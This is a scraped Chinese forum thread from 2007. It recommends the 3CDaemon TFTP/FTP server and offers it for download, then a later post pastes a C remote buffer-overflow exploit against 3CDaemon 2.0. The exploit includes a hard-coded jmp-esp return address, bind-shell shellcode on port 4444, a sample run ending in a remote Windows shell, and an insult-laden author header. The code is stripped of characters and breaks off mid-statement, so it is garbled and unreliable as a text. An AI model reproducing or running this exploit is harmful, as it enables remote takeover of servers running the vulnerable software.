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1、相当好用的 TFTP 工具-3CDaemon经常给设备升级的朋友可能会用到 Cisco 的 TFTP 那个小工具,但有时候升级大文件的时候,这个工具却显得那么的无能为力。下面给朋友们推荐一个 3COM 公司的 FTP 工具-3CDaemon,支持多种协议的小型服务软件,其功能简练、使用方便是最大的优点,并在 TFTP 方面支持大文件传输。如果需要的话快下载一个用用吧 这个软件是共享版的,但可正常使用,你就把它当成正式注册版用就可以了这个东西还是不错的 平时也用哈附件11.jpg (17.3 KB) 2007-9-1 09:11 12.jpg (41.06 KB) 2007-9-1 09:11

2、13.jpg (28.77 KB) 2007-9-1 09:11 3CD 英文帮助.zip (132.05 KB) 2007-9-1 09:16, 下载次数: 637 3CDaemon.zip (267.91 KB) 2007-9-1 09:16, 下载次数: 2681 NQQ:247656Netemu 提问技巧 http:/ TOP 小漏 登峰造极2# 大 中 小 发表于 2007-9-1 09:12 只看该作者 3CDaemon 更新日期 2005.04.15 程序类别 CISCO 工具 文件大小 923KB 授权方式 自由软件 发短消息 加为好友 当前离线 应用平台 Win 9X/ME/

3、NT/2000/XP 推荐程度 * 简介:ftp,tftp server client,syslog 合一的 3CDaemon在放一个中文版本附件3CDaemon.zip (267.91 KB) 2007-9-1 09:19, 下载次数: 1858 NQQ:247656Netemu 提问技巧 http:/ TOP 小漏 登峰造极 发短消息 加为好友 当前离线 3# 大 中 小 发表于 2007-9-1 09:21 只看该作者 /* 3Com Ftp Server remote overflow exploit author : c0d3r kaveh razavi c0d3rz_ packag

4、e : 3CDaemon version 2.0 revision 10 advisory : http:/secway.org/advisory/ad20041011.txt company address : it is just a simple PoC tested on winxp sp 1 and may not work on other systems . just a lame coded software that didnt cost to bother myself to develop the exploit code . every command has got

5、 overflow . compiled with visual c+ 6 : cl 3com.c greetz : LorD and NT of Iran Hackers Sabotages , irc.zirc.org #ihs Jamie of exploitdev (hey man how should I thank u with ur helps?), sIiiS and vbehzadan of hyper-security , pishi , redhat , araz , simorgh ,packetstorm securiteam , roberto of zone-h

6、, milw0rm (dont u see that my mail address has changed?) Lamerz : shervin_ with a fucked ass ! , konkoor ( will be dead soon ! ) ashiyane digital lamerz team ( abroo har chi iranie bordin khak barsara ! ) /* /* D:projects3com.exe 21 c0d3r secret - 3Com Ftp Server remote exploit by c0d3r -

7、building overflow string attacking host packet size = 673 byte connected sending username sending password exploit sent successfully try nc 4444 D:projectsnc 4444 Microsoft Windows XP Version 5.1.2600 (C) Copyright 1985-2001 Microsoft Corp. C:Program Files3Com3CDaemon *

8、/ #include #include #include #include #pragma comment(lib, ws2_32.lib) #define address 0x77A7EE6C / jmp esp lays in shell32.dll in my box #define size 673 / 3 byte command + 235 byte NOP junk + / 4 byte return address + 430 byte shellc0de int main (int argc, char *argv) char shellc0de = / some NOPS

9、+ shellcode bind port 4444 x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x90x90x90x90x90x90x90x90x90xEB x5Ax4A xC9x66 xB9x7D x80 x0Ax99xE2xFAxEB xE8xEBxFFxFFxFF x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12 xE9x85 x12xD9x91x12 x12xEAxA5x12xEDx87xE1x9A x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8

10、x12xA6 x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58 x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0 x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12 xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B x6

11、6xCEx75x12 x5Ex9Ex9Bx99x9Dx4BxAAx59 xDEx9D xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0 x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF xB5x98x98 xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8 xC8x5ExDExA5xFAxF4xFDx99 xDExA5xC9xC8x66xCEx79 xCBx66xCEx65xCAx66x

12、CEx65xC9x66xCEx7DxAAx59 x1C x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59 x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5 xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6 xAAxABx99xCExCAxD8xCAxF6xFA

13、xF2xFCxEDxD8x99xFBxF0 xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99; unsigned char *recvbuf,*user,*pass; unsigned int rc,addr,sock,rc2 ; struct sockaddr_in tcp; struct hostent *hp; WSADATA wsaData; char buffersize; unsigned short port; char *ptr; long *addr

14、_ptr; int NOP_LEN = 200,i,x=0,f = 200; if(argc h_addr,hp-h_length); else tcp.sin_addr.s_addr = addr; if (hp) tcp.sin_family = hp-h_addrtype; else tcp.sin_family = AF_INET; port=atoi(argv2); tcp.sin_port=htons(port); printf(n attacking host %sn , argv1) ; Sleep(1000); printf( packet size = %d byten , sizeof(buffer); rc=connect(s


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